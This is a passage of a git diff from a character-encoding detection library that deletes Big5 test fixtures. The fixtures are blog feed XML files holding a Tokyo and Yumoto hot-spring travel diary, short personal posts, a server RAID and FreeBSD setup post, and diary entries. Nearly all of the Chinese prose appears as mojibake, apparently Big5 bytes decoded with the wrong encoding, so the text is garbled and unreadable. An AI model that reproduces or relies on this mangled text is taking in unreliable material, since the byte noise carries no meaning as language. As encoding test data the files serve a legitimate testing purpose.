src='http://photos1.blogger.com/img/19/2235/320/DSCF0116.jpg'></a><br />ְ\ֶU¸ֲּ\₪F³\¦h¥@¬ֹ¦U°ך×÷¯Qְt³y«¬¹¢«~¡A¦³¦ֱׁף¦₪v»`¶°×÷¡A₪]¦³¹C«ָ±a¨׃×÷¦ס₪גֲ§¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0121.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0121.1.jpg'></a><br />¥t¥~₪]ְ³´÷¦aֲ\©ס³\¦h¥i·R×÷¸t½ֿ¸ֻ¹¢¡Aֵ‎¾ד­׃¥־ְ\×÷®נ×^µ־¾A´r§ײ¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0125.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0125.1.jpg'></a><br />¶÷«ב²¢ֲI¬O¦ֱׁף®Q¦₪v¯N×÷¦׳®₪f¨‎₪p³J¿|¡A·f°t₪@×M¼צִִֻֻ×÷©¯ש¡A₪ס₪₪₪ָ×÷µז¦גֲ׳²±³\¦h¡A§₪S¬O¦Y­׃÷כ¥ת¡A¹¡¨ל₪£¦ז¡I¶÷«בµy¨ֶ¥נ®§¡A±µµ¨ֹ¥־¥L­ּ×÷₪י¦¡­·§f¡A¦A«׳₪@­׃₪H¿W¦₪j¯D¦ְ(«¿ע¾ׁ¡Aֱ¬O₪£¯א©ח)¡Aµ־µ־×A×A¦a×w₪F­׃¾‏«ב¡A³ֵר7-11¶R¨׃×÷¸²µו¬c₪f¨‎°s÷כ¶¼®ֶ¡A´N¶i₪J¹¶m¡K¡A©ת₪ׁ­n¨ל×F·׃®c¨«¨«¡A±µµ₪S­n¦^¨ל×F¨¡A¨£ֳׁ»ָ®y×÷¨B¦ז×ּ₪ׁ°ך¡A₪j®a±¦w₪F¡C - - - - -Sylvia1976 - -2004-12-22T21:01:35+08:00 -2004-12-27T17:29:35Z -2004-12-27T17:26:38Z - -tag:blogger.com,1999:blog-8966767.post-110416839891622594 -Tokyo Xmas...Day4 Mornning -ֱצµM¬Q₪ׁ±₪W¦¬¬B¦ז§ץ₪־¾ד²z¹C°O¨ל₪TֲIֱִ¡A¥i¬O¬°₪F»°·f8¡G10×÷×F×Z₪י¥ת½u¡A²M±ב6¡G30¡A₪ְְֱׁ«G¡A§´N₪w¸g°_§ֹ₪F¡A·ַ³ֶ¨ל¨®₪W¸ֹ¯v¡K¡C¥i¯א¬O÷־¯v₪£¨¬×÷ֳצ«Y¡Aֱ¨S¥Xµo´N¦b×F×Z²L¯ף¯¸±¼₪F₪@°¦₪ג®M¡A¹ן©ף­n¨ל₪U³·×÷´צ₪¸·ֵ¬u×÷§¨׃»¡¡A¯u¬O´¸₪ֵׁRֶE¡IµL½׳¦p¦ףֱ¬O¥‎₪W¨®¡A¨ל₪F₪י¥ת¦A»¡¡C<br />×F×ZֵK¹D×÷§ײ³t¦C¨®¬O«÷כ½o×÷₪p¦C¨®¡A®y¦ל³£¬O±ִ¥|₪H¹ן§₪×÷§־¦¡¡A­n¨ל₪י¥ת¡A¥²¶·§₪¦bְY¨ג¸`¨®´[¡A¦]¬°¨ל₪F₪U₪µ¥«¡AְY¨ג¸`¨®´[´N·|»P«ב­±¦n´X¸`₪ְֲק¡A¿W¦«e©¹₪י¥ת¡A¨ה¥L×÷¨®´[ִ~ִע©¹°­«ד₪t«e¶i¡Cֱצ»¡¬O¦­₪W8¡G00¡A·f¨®×÷₪Hֱ¬OֶZ¦h×÷¡A¨®´[₪j¬ש¦³₪»₪ְ÷¡§a¡I¨®₪l₪@µo°¡A§´N©°g₪F¡K¡C<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0004.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0004.1.jpg'></a><br />¿פ¨׃¥H«ב¬ש²צ¹L₪F₪@₪p®ֹ¡A¦C¨®¥¿¦ז¨«¦b₪@₪ש¥­­ל₪§¶¡¡A¦p×G₪£¬O«״¿v׫×÷³y«¬₪£¦P¡Aֱ¯u¦³¦ז¨«¦b¹ֵ«n¥­­ל×÷¿שִ±­ש¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0011.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0011.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0012.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0012.1.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0015.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0015.1.jpg'></a><br />®·®»´X±i¿סֱן¥­­ל×÷µe­±¡A´N¶}©l¬צ¿‎¬Q₪ׁ×÷¹C°O¡A¼gµ¼gµ¡A¨®₪l÷C÷C¶i₪J₪s°ֿ¡A₪י¥ת§ײ­n¨ל₪F¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0224.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0224.jpg'></a><br />×F×Z₪י¥ת¨®¯¸±ִ¼¦¡³y«¬¡A¼׀°×543₪½₪״¡A®נ·ֵ¸ע²M±ב×÷×F¨®t₪£¦h¡A§×÷Goretex¥~®M¸ֱּ¨S¥[₪W¦׀₪ע₪÷¸ּ¡A₪]ֱ¨S¬ן₪W¬Q₪ׁ¦ו«ק¨׃×÷½ֳ¥ֽ¿ַ¡A¨ֳ₪£·|ִ±±o§N¡I¥‎·f­¼6¸¹©¹´צ₪¸·ֵ¬u×÷₪₪h¡A¦bֱ`¦X·|ְ]«e₪U¨®¡A´N¸עTurtle Innֱpµ¸¡A¥L­ּ«¼צ₪×÷¨׃¨®¯¸±µ§¡A¨ֶ¹ך₪W¡ATurtle Innֲקֱ`¦X·|ְ]¨ֳ₪£»·¡A¨«¸פ₪j·§₪­₪ְֱִ´N¨ל₪F¡C<br />Turtle Inn×÷¦ֱׁף®Q¡A¬O­׃²¢¬×÷₪₪¦~°₪H¡A·|ֱ¿¬y§Q×÷₪י¥»µִ­^»y¡A·¾³q§¹¥‏₪£¦¨°ֳD¡A©ׂ¥H°£₪F§₪§¥~¡A₪j³¡₪ְ¦ם±J×÷₪H³£¬O¼¬₪H₪h¡C¿ל§¹Check in₪גִע¡A«ז¦£¥[±j§×÷¿m´H¸ֻ³ֶ¡A·ַ³ֶ·f­¼11¡G30×÷6¸¹₪₪h¡Aִ~ִע«e©¹´צ₪¸(YUMOTO)·ֵ¬u¡C<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0021.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0021.1.jpg'></a><br />±q₪י¥ת¨ל´צ₪¸¬ש²צ­n₪@₪p®ֹ₪G₪Q₪ְ¡A§₪@«׳µS¿¨ל©³­n§₪¨ל´צ₪¸·ֵ¬u¡Aֱ¬O¦b₪₪ֱI¦x´ע¯`×±¡A¨®¦ז¥|₪Q₪ְֱִ¨ל₪₪ֱI¦x´ע¡A¥נ®§₪Q₪­₪ְ¡A₪j®a¥¿·ַ³ֶ₪U¨®®ֹ¡A₪W¨׃₪F₪T­׃¸t½ֿ¦ׁ₪½₪½¡Aֵ‎₪j®a÷N±m¡A§÷N¨ל₪F¥|¸¹¼ת¡A¬O´צ₪¸¦W²£¡A₪@₪f¦ֳֿ¼¡I±µµ´N₪U¨®³}³}¡C<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0031.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0031.1.jpg'></a><br />₪₪ֱI¦x´ע«¬¡A₪]«§N¡A¦‎¬O¨ֳ¨S¦³³·¡I§¥¿¦b·Q­n₪£­n¦h§₪¥b₪p®ֹ×÷¨®¨ל´צ₪¸·ֵ¬u©־¬O¦b₪₪ֱI¦x´ע×÷´ע¯`·ֵ¬u×w₪@×w´N¦n®ֹ¡A¬¨ל₪@¶פ¹q₪l¬×O¡A₪÷®e₪j¬ש¬O´צ₪¸¦a°ֿ¸פ­±¿n³·¡A½׀₪p₪¾r¾p₪§ֳ‏×÷¡A¹y®ֹ§´N¨M©wִ~ִע©¹´צ₪¸«e¶i¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0037.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0037.1.jpg'></a><br />§ײ­n¨ל´צ₪¸¦a°ֿ«e´N¶}©lִֶ³·₪F¡A¨ל₪F´צ₪¸·ֵ¬u¡A§ף¬O¥ױ³·ֶGֶG¡I₪ׁ×ֵ₪]₪£ֲ_ִֶ₪U³·×ב¡Aֵ‎§ֵU₪£±o¨Sְ¹₪ג®M¡Aֱ¦³¬¾ק×÷°ֳD(₪£×¾¹D₪°»ע®ֹ­װ₪£₪p₪±ר¦¨MF MODE₪F¡AµL×k¦°¹ןµJ¡I)¡A«ק©R©ח·׃¡I¦‎¬O₪ׁ®נ¹ך¦b₪׃§N¡A±`±`ֱ¨S¹ןµJ§¹¡A₪ג´N₪w¸g¥¢¥h×¾ִ±₪F¡K¡C¥‎ֵ‎₪j®a¬¬¬ִR×÷´צ₪¸·ֵ¬u₪־´צ₪§´ע§a¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0056.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0056.1.jpg'></a><br />¥J²׃¬¡I¬¨ל³·×ב₪F¶¡H<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0057.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0057.1.jpg'></a><br />¬ִR×÷´צ₪§´ע¡C<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0062.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0062.1.jpg'></a><br />´צ₪§´ע®ַ¦³₪@₪j₪שִ׸«¡A¦b¶§¥ת×÷·׃®g₪U·¬O¬ִR¡I¥i±₪§©ח×÷®ֹ­װ₪׃¶§₪½₪½¨ֳ₪£½אֱy...¡C<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0066.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0066.jpg'></a><br />´צ₪¸¦a°ֿ×÷°ך®a₪½¶י÷²z³ז¦ל₪j·§³£×ר±o³o­׃¼ֻ₪l¡A«¥i·R§a¡I<br />³o»ע§N×÷₪ׁ¡A·םµM­n§ה­׃¦n¦a₪ט(³ּ¦n¬Oֳh¥®ֶ²z¡I)¡A¦n¦n¦Y₪@¹y¡AµM«ב×w­׃´צ¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0053.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0053.jpg'></a><br />§§ה₪F₪@®a¦³ֵS₪ׁ­·§f¦׃¥B¥i¥H¥־ְ\×÷ְ\ֶU¡A¶i¥h₪§«ב₪S¬O¸ע¦ֱׁף®Q₪@°}₪ס₪גµe¸}¡A₪§«בֲI₪F₪@¥ק»R¯ס×₪¶÷¡A¶÷¬O·ם³ץ¥־₪pֵKֱח©M°s÷כ»I×₪×÷¡A¦]¦¹­nµ¥₪W₪G₪Q₪ְֱִ¡Aµ¥¨ל₪ץ÷¶₪F₪~¥i¥H¥‎¶}»\₪l¡C<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0046.2.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0046.2.jpg'></a><br />³o₪G₪Q₪ְֱִ¸ּ¡Aֱח₪l₪£ֲ_«_¥X¥ױ·ֿ¡Aֱ¦³ֲז¥ִ±qֱח»\ֳה½t«_¥X¨׃¡A­»±o₪£±o₪F¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0050.2.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0050.2.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0051.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0051.1.jpg'></a><br />°£₪F×₪¶÷₪§¥~¡Aֱ¦³₪T÷׀₪pµז©M₪@¸J¨‎¼W(§ה₪£¨ל₪f¦rֳה)´צ¡A¶÷«ב²¢ֲI¬O₪@²y­»¯ף¦B²N²O¡A¡A₪@¦@­n1600Yen¡A¦³₪@ֲI¶Q¡A¦‎¬O×₪¶÷¹ך¦b¦n¦Y¨ל₪£¦ז¡Aִ­§t¦U÷״³¥µז©M£ֳ‏×÷­»®נ¡A²M²H²n₪f₪£×o¿°¡A§₪@¦@²K₪F₪T¦¸¡A§ג¾דֱח¦Y­׃÷כ¥ת¡A₪@²ֹ₪£³ׁ¡I±µ₪U¨׃¡A´N¬O­«ְYְ¸¢w¡u×w´צ¡v₪F¡C<br />¥L­ּ×÷­·§f¦b₪G¼׃¡A«ַ₪÷¦³₪@¦ְ¡A«ַ¥~¶§¥x₪W₪]¦³₪@¦ְ¡A₪£×¾¹D«״¿v¬O«ח»ע³]­p×÷¡A«ח»ע©׃¨³o÷״­«¶q¡H¡I´צ₪¸·ֵ¬u¬O²L÷ס¦ג¡A¨S¦³¯S§Oµש©ת¥¦×÷ְר®ִ¡A§×w¦b₪ב¥~¦ְ¡A₪@­±¥ץְY¬µ₪ׁ×ֵ₪£ֲ_ִֶ₪U²׃²׃×÷³·×ב¡Aֱ¨S±¼¨ל·ֵ¬u¸ּ´N₪£¨£₪F¡A₪@­±¨ֹ¨·x©I©I×÷·ֵ¬u¡A¹ך¦b¸U₪ְ´g·N¡I¦׃¥B₪£×¾¹D¬°₪°»ע¡A₪µ₪ׁ×÷´צ₪¸¦a°ֿ¨S₪°»ע¹C«ָ¡A©ׂ¥H¨ג₪j¦ְ·ֵ¬uְH§ְRְR¦a×w¡A§¹¥‏₪£¨§O₪H₪zֲZ¡A₪]₪£¥־¾ב₪ְ×§¼×÷°ֳD¡Iֱ`¦׃¨¥₪§¡A¯u¬O₪@₪j¨ֹ¨¡I₪£¹L­·§f¬O₪£¯א±a¬¾ק¶i¥h×÷¡A©ׂ¥H¡A«¿ע¾ׁ₪£¯א©חµ¹₪j®a¬ֵo¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0068.2.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0068.2.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0069.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0069.jpg'></a><br />×w§¹´צ₪§«ב¡A₪S¦b´צ₪§´ע®ֳַה´²¨B©ח·׃¡A³~₪₪ֱ¬¨ל₪@­׃µ²¦B×÷₪p¦ְ¶ם¡A§®tֲI·ם°µ¬O¬f×o¸פ₪@¸}½ס¶i¥h¡Aֱ¦n×`·N¨ל±q¦a₪W«_¥X¨׃ִ׸«¡I<br />¨ֹ¥־§¹¬´÷¡B¬­¹₪־¬´צ¡A±µ₪U¨׃´Nµ¥₪TֲI₪G₪Q×÷₪½¨®¨׃¡A¥‎«e©¹₪₪ֱI¦x´ע¡A¦A½ס₪W¦^µ{¡A¨ֹ¥־Turtle Inn¦ֱׁף®Q·ַ³ֶ×÷₪י¦¡±ְ\ֵo¡I - -
    diff --git a/chardet/tests/Big5/tlkkuo.blogspot.com.xml b/chardet/tests/Big5/tlkkuo.blogspot.com.xml deleted file mode 100644 index 4c09aa5..0000000 --- a/chardet/tests/Big5/tlkkuo.blogspot.com.xml +++ /dev/null @@ -1,119 +0,0 @@ - - - - - - -karenkuo's blog -Post all your comments but my stomach is watching... - -tag:blogger.com,1999:blog-9888218 -2005-06-28T02:03:21Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    - - - -karenkuo - -2005-06-27T18:56:00-07:00 -2005-06-28T02:03:21Z -2005-06-28T02:03:21Z - -tag:blogger.com,1999:blog-9888218.post-111992420127224932 -§ה₪£¨ל¦ר×A¾¹ - -
    ²V³J¡I§³ּ«כ¨ל³o­׃÷פ­¶¡C
    -
    -false -
    - - - -karenkuo - -2005-06-23T00:07:00-07:00 -2005-06-22T20:20:22Z -2005-06-22T16:08:11Z - -tag:blogger.com,1999:blog-9888218.post-111945649136686949 -I'm no longer here - -
    perhaps i've decided to move
    -
    -http://karenkuo.blogsome.com/ -
    -
    p.s
    2006 ±y¹C¥d»P°ך»¾ַ¥ֳֽׂµ²¦X¡@¨ֹ106°ךְu´f
    -http://tw.news.yahoo.com/050622/195/1zfjo.html -
    -
    -false -
    - - - -karenkuo - -2005-06-22T21:42:00-07:00 -2005-06-22T13:44:54Z -2005-06-22T13:44:54Z - -tag:blogger.com,1999:blog-9888218.post-111944789480135977 -½ֳ¥ֽ¯ָ¨ל©³¬O¨׃ְ¿²\ֱ¬O¦½ - -
    ¬נµM·Q­n¶R₪ג©¬
    -
    -false -
    - - - -karenkuo - -2005-06-22T08:53:00-07:00 -2005-06-22T13:13:06Z -2005-06-22T00:54:58Z - -tag:blogger.com,1999:blog-9888218.post-111940169881512165 -¶ֲ¦ח¶ֲ¿ַ¶ֲִ₪l - -
    ¥ֽ©R¸ּ¨ה¹ך¨S₪°»ע¦n¶ֲ¦ג×÷
    ֱצµM³o»ע»¡
    ¨÷₪]¥u¬O§₪@­׃¥¬×÷©ְְY
    -
    -false -
    - - - -karenkuo - -2005-06-21T21:36:00-07:00 -2005-06-21T16:27:56Z -2005-06-21T13:39:09Z - -tag:blogger.com,1999:blog-9888218.post-111936114974309652 -i'm all bullshit - -
    ¬°₪°»ע§ֱ`¬O¨S°µ¦n?
    ¬°₪°»ע©m³¢×÷₪H´N¬O±¡÷¥ױֳ¨?
    ¬°₪°»ע¦₪v®a₪H³£¨S¿ל×k¦w¼¢?
    ¬°₪°»ע₪@¾ד₪ׁ₪°»ע§¾³£ֱ¿₪£¥X¨׃?
    ¬°₪°»ע¨ל₪F²{¦bֱ¬O·|¦©R²M°××÷ִ±±o¦₪v¦³©ׂ₪£¦P?
    -
    -false -
    - - - -karenkuo - -2005-06-20T06:55:00-07:00 -2005-06-21T16:39:23Z -2005-06-20T13:59:23Z - -tag:blogger.com,1999:blog-9888218.post-111927596372631182 -ֱך§־ֲ־ֱֹ¶] -<a href="http://www.flickr.com/photos/karenkuo/20467126/" target="blank"><img src="http://photos16.flickr.com/20467126_afd60c2921_m.jpg"></a><br />©_©ַ?!<br />ֱ`¬O¦b¨÷÷״¼׀ֳD₪U₪~¦³₪H·|·Q­n¦^§¯d¨¥!<br /><br />₪µ₪ׁ±₪W§­ָ¯Z©ׂ¥H₪£·|¦A¦^®a÷־ִ±₪F,<br />₪₪₪ָ´N×½±µ¦b₪j§B®a¥X×ש,<br />©ת₪ׁ­n¬¬ש×÷₪p©j,¥i§_¬¨ל¯d¨¥¥´­׃¹q¸µ¹§?<br />ֱֱֲֲ§A -false - -
    diff --git a/chardet/tests/Big5/tw.blog.xubg.com.xml b/chardet/tests/Big5/tw.blog.xubg.com.xml deleted file mode 100644 index 2c89fc6..0000000 --- a/chardet/tests/Big5/tw.blog.xubg.com.xml +++ /dev/null @@ -1,249 +0,0 @@ - - - - - - - ÷ר¦ֿ°O¨ֶ¥» - http://tw.blog.xubg.com - ₪u§@₪י»x - Copyright 2005 - Sun, 10 Jul 2005 12:58:57 +0000 - http://wordpress.org/?v=1.2.2 - - - ֲשCPU¦ר×A¾¹¡A¦w¸ֻRAID 5 - http://tw.blog.xubg.com/index.php?p=63 - http://tw.blog.xubg.com/index.php?p=63#comments - Sat, 09 Jul 2005 03:50:04 +0000 - - ¨t²־÷²z₪ו¥ף http://tw.blog.xubg.com/index.php?p=63 - ³ּ×סְ°±i®ׁ¾ֻ¦ׁ®v¡A¾ד²z¦ז¾P÷²z¨t×÷¦ר×A¾¹ -³o¥x¦ר×A¾¹₪v¸g¶¢¸m«₪[₪F¡Aֵ¥¦ׁ®v»¡¦±q₪@¦~«eWindows¨t²־¥X°ֳD´N©ס¦b¨t¿ל₪£¨ֿ¥־ -³o₪@¥x¹q¸£ֱצµM₪v¸g₪T¦~×÷«e×÷¾ק¾¹¡A¬O§»שײ₪₪¶¥¦ר×A¾¹ֲשcpu×÷ְ³¸׃ֱ₪£¿ש -­ל¥»¨ֿ¥־Windows 2000§@·~¨t²־¡A¨÷²{¦b­n§ן¥־Freebsd·ם§@·~¨t²־ -¥‎₪W§»שײ×÷÷פ¯¸¬d¬¦ר×A¾¹₪ה´©¨÷¨ַ§@·~¨t²־ -ֱV¿|¨S¦³₪ה´©Freebsd¥u¦³₪ה´©Red Hat linux¦׃₪v¡A·םµMֱ¦³¨ה¥L´×÷§@·~¨t²־ -¬¨׃¥i¯א¦₪v­n×ב«¦h®ֹ¶¡¨׃´ת¸ױ¡A§ן¥־Freebsdµ´¹ן¬O₪@¶µ₪j₪uµ{ -₪@®³¨ל¾ק¾¹₪§«ב¡A³÷µM¶}₪£₪F¾ק´N°±¯d¦b¶}¾קbios×÷µe­± -¥u±o°e¦^­ל¼tְֻ­׳¡Aְֻ­׳µ²×G¥D¾ק×O»PRAM³£ֳa₪F -³£¨S¦³°¨ל₪°»ע´N×ב₪F₪»₪d₪¸¡Aֱ¦n¥D¾קש¬O₪T¦~«O©T¡A¦‎RAM´N¹L«O©T -¦ר×A¾¹¥X°ֳD­׳²z°_¨׃¹ך¦b₪£«K©y -²׳©ף¥i¥H¶}₪uֵo!!! -³ֲ·׀¨׃₪F¡A¦ר×A¾¹¨ֿ¥־AIC 7899×÷RAID Card¥i₪ה´©¼צ´¡© -³o₪@´×÷RAID Card«©_©ַ¡A©ת©ת´N₪@±i¥d«ח»ע·|¦³A¡AB¨ג­׃₪¶­± -°₪@₪U­ל¼t₪uµ{®v»¡³o±i¥d´N¬O³o¼ֻ¡ASCSIµw÷׀­n·׃¶¶§ַ₪£¯א¸ץµ´¡ -¦׃¥B­n¶i¥hSCSI¥dBIOS₪÷¥h³]©w¡A³£³]©w¦n₪~¯א¥־ -ֱ¦n·sש×÷FreeBSD-5.4₪÷«״¦³¥¦×÷ֵX°µ{¦¡¡A₪£µM´N©­ֵֻo -¦ר×A¾¹³ּ¦n³£¬O¶]RAID₪£÷¬Oµwֵי₪ה´©©־¬O¥ׁ³nֵי¼ְְׂ³£¦n -¦׃¨ֿ¥־µwֵי₪ה´©×÷RAID¬O­÷¿ן -RAID³]©w¦³RAID0¡BRAID1¡BRAID5¥H₪־RAID10 -¦׃³o­׃¦ר×A¾¹¦³4ֱ36g×÷SCSIµw÷׀¡A¨ֿ¥־RAID5³ּ₪ײ»­n3ֱ¥H₪W×÷µw÷׀¡A¥H5ֱ³ּ¦X¾A - http://tw.blog.xubg.com/wp-commentsrss2.php?p=63 - - - ¨§»G脚©גµ¬ - http://tw.blog.xubg.com/index.php?p=62 - http://tw.blog.xubg.com/index.php?p=62#comments - Sun, 26 Jun 2005 09:24:44 +0000 - - ₪±¡ְH₪ג°O http://tw.blog.xubg.com/index.php?p=62 - ³o´X₪ׁ×÷₪ׁ®נֵ₪ֶ«₪j -¦׃¥B«B₪U₪£°±¡A«¦h¦a₪ט³£²T₪פ -«B₪@×½₪U₪¸ּ₪]ִ±±o·׀¡A«D±`₪£₪ט«K¥u¯א«¦b®a¸ּ -©ׂ¥H³£¨S±a§®a¨§»G¶]¨B¡A¬«H¥L₪]·|ִ±±o·׀ -­ט¦n±₪W«B¦³µyµy°±·²¡A¶Xµ³o­׃¾ק·|´N±a¥L¥h¶]¨B -₪@¥X×ש¨§»G¦n°×¿³§³£§ײ©װ₪£¦ם₪F¡Aֵ¦¨¥L©װµ§¶] -¥­±`¶]₪@₪U´N¶}©l×F»D»D¦ט¬¬×÷¶¶«K¯d₪U®נ¨‎ -₪µ₪ׁ₪ֿ±`´N₪@×½¶]₪@×½¶]¡Aֱ¬O©T©w₪@¼ֻ×÷¦זµ{ -¨ל¶‎¯×¼q«פ«פ₪§«ב§י×נ¦^¨׃ -¦b¶]¨B®ֹ¡A¥L³£·|©T©w§¿§¿¯d₪U¨‎¹D -¥­®ֹ¥L§¿§¿³£₪£·|©ן&#33050;\¡A³ּ×ס¥L¾ַ¨לֳa²÷D₪F -§ּE»¡§®a¨§»G¬O¶Q±×¯¡A₪£¯א¹³³¥×¯₪@¼ֻ¸עµ©ן&#33050;\§¿§¿ -¥u­n©ן&#33050;\§¿§¿´N­n×ָ¥¿¥¦¡A­n¸ע¥¦»¡₪£¦ז -¨§»G©ָ³Q¥´©ׂ¥H´X¦¸₪§«ב´N₪£₪׃´±¡A¦‎¥¦§¿§¿¦³®ֹ­װ³£·|°½°½©ן&#33050;\ -©ׂ¥H₪@¬¨ל¥¦©ן¨÷₪@°¦&#33050;\´N¥´¨÷₪@°¦¡Aֵ‎¥¦₪£­n¾ֳַa -©ׂ¥H¥¦§¿§¿³£·|×`·N¬µ§©ָ§¥´¥L -¦³®ֹ­װ·|°½°½×÷¸ע§°₪ֿ½ױ¡A¬G·N¶Xµ§₪£×`·N®ֱֹ¬O·|°½°½×÷°µ -₪£®ֹ°½÷ֻ§×`·N§¦³¨S¦³¦b¬¥¦¡A¨S¦³´N«¨³³t©ן₪@₪U -₪µ₪ׁ₪£¾ו±o¬O₪£¬O₪׃₪[¨S¦³¶]¨Bֱ¬O₪׃÷ע±i -¨§»G₪@¼ֻ°½°½©ן°_¨׃§¿§¿¡A«o&#33050;\©גµ¬ -«ב&#33050;\§µ§µ¡Aֳה§ֳה¸ץ -₪@×½¥־²´·ת¾l¥ת÷ֻµ§¡A©ָ§µo²{₪S¥´¥L -·ם®ֹ¯u¬O₪׃¦n¯÷¡A´N³o¼ֻ₪@¸פ₪W§µ§µ§¦^®a -©װ₪£©װ¦h¯u×÷«·|·d¯÷¥i¯א₪׃ֱo©ת₪F§a~~§·Q -ֳz¯÷×÷¨§»G - http://tw.blog.xubg.com/wp-commentsrss2.php?p=62 - - - ₪pֵ@₪hֳh¥¥₪F - http://tw.blog.xubg.com/index.php?p=61 - http://tw.blog.xubg.com/index.php?p=61#comments - Wed, 22 Jun 2005 08:56:45 +0000 - - ֲר°O http://tw.blog.xubg.com/index.php?p=61 - ₪µ₪ׁ³­×ְ¨¬O¾פְY¶E©ׂ¬ֲו¥ֽ -³ּ×ס₪ׁ®נֵ₪ֶ¯u₪j¡A¦n¦h₪H¥h¬¯f -­ט¦n₪pֵ@₪h₪µ₪ׁ¦³­ָ¯Z¡A¬¨£¦o¬ןµ¥¥°×A¦b¦£ -§·Qְ³¸׃ֳh¥¥₪F¡A¨{₪l³£₪j×÷¬×÷¥X¨׃ -¶Xµ¦o₪u§@×ְֵֹ®ֹ¥h¸ע¦o²ב²ב₪ׁ¶¶«K®¥³¦o -₪~×¾¹D₪v¸g₪»­׃₪כֵo -¦oֱ°§·|₪£·|ֵ×÷«­D©־«¸~ -­n·ם¶‎¶‎×÷₪Hֱ¬O«¦b·N¨­§ק -¥u­n¬O₪k¥ֽ₪j·§³£·|«¦b·N§a¡A·R¬×÷¶‎¶‎ -²{¦b¬¨ל¦oֳh¥¥₪F¡Aִ±±o«´ְ¦o°×¿³ -₪§«e₪»ִ»ִ×÷·Pִ±₪@ֲI³£₪£¦s¦b -₪ֿ¦׃²{¦bִ±±o§ףְ³¸׃®¥³¯¬÷ײ¦o¡A¬¦o³o¼ֻ₪²z₪]·|¸עµ°×¿³ -§ֶ±ז§×÷×B₪ֽ³£¯א¹L×÷§ײ§ײ¼ײ¼ײ×÷ - http://tw.blog.xubg.com/wp-commentsrss2.php?p=61 - - - ₪f¸ױ³q¹L - http://tw.blog.xubg.com/index.php?p=60 - http://tw.blog.xubg.com/index.php?p=60#comments - Sun, 19 Jun 2005 04:32:59 +0000 - - ₪±¡ְH₪ג°O http://tw.blog.xubg.com/index.php?p=60 - ₪f¸ױ®ֹ¶¡¦w±ֶ¦b6₪כ17₪י -½׀¨׃¦b¾ַ¬ֹ¦³¦W®נ×÷₪jµP¦ׁ®v¾ב¥פ₪f¸ױ©e­ -¥]§t¥»¨­×÷«¾ֹ±׀±ֲ¡A³o₪T­׃¦ׁ®v³£¬O­p₪₪¥D¥פ -¦¨₪j¿א·ֻ×Q¦ׁ®v¡B°×®v₪j·¨₪₪¬׃¦ׁ®vֱ¦³«¾ֹ§×÷¾G¶i¿³¦ׁ®v -±q¥h¦~12₪כ©³®ֹ¦ׁ®v´N§i»|§¡A­n¦n¦n×÷·ַ³ֶ -¥i¬O§¹ך¦b₪׃²V₪F¡A×½¨ל₪f¸ױ«e₪G₪ׁ₪~±N½׳₪ו×÷×ל½Z¼g¦n -¿ֻ¦°eµ¹₪f¸ױ¦ׁ®v¡A¦V₪f¸ױ¦ׁ®v¥h­P÷p 